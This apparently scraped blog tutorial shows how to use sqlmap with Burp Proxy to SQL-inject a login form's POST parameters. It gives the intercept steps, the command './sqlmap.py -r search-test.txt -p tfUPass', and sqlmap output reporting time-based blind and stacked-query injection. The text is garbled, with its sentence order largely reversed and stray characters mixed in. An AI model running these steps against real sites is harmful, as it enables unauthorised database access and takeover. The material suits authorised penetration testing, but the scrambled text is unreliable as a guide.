Do you want to keep testing the others? N target url appears to be UNION injectable with 2 columns Sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? (default) or provide another target address based also on the redirection got from the application using unescaped version of the test because of zero knowledge of the back-end DBMS testing 'Generic UNION query (NULL) - 1 to 10 columns' testing 'MySQL UNION query (NULL) - 1 to 10 columns' POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable testing 'Microsoft SQL Server/Sybase time-based blind' testing 'PostgreSQL > 8.1 AND time-based blind' testing 'MySQL > 5.0.11 AND time-based blind' POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable testing 'Microsoft SQL Server/Sybase stacked queries' testing 'PostgreSQL > 8.1 stacked queries' testing 'MySQL > 5.0.11 stacked queries' testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' testing 'PostgreSQL AND error-based - WHERE or HAVING clause' testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
testing 'AND boolean-based blind - WHERE or HAVING clause' testing sql injection on POST parameter 'tfUPass'
heuristic test shows that POST parameter 'tfUPass' might not be injectable testing if the url is stable, wait a few seconds there is an injection in POST parameter 'tfUName' but you did not provided it this time resuming injection data from session file using '/home/testuser/sqlmap/output//session' as session file the testable parameter 'tfUPass' you provided is not into the Cookie the testable parameter 'tfUPass' you provided is not into the GET parsing HTTP request from 'search-test.txt' Sqlmap/0.9 - automatic SQL injection and database takeover tool p is the parameter we are attacking./sqlmap.py -r search-test.txt -p tfUPass Run sqlmap as shown here the option -r tells sqlmap to read the search-test.txt file to get the information to attack in the POST request. Copy the POST request to a text file, I have called it search-test.txt and placed it in the sqlmap directoryĦ. Burp catches the POST request and waitsĥ. Click on the submit button on the login formĤ. Configure Burp proxy, point browser Burp ( 127.0.0.1:8080) with Burp set to intercept in the proxy tab.ģ. Our online sql scanner is only configured to test GET request based injections.Ģ. To perform the POST request sql injections you will need your own installation of sqlmap. This is a quick step by step guide to getting it work, we are using Burp Proxy (Free Version) to intercept the post request. However I have recently had to revisit this feature and have found it be to much improved.
In the past using sqlmap to perform POST request based SQL injections has always been hit and miss (more often a miss).
0 kommentar(er)
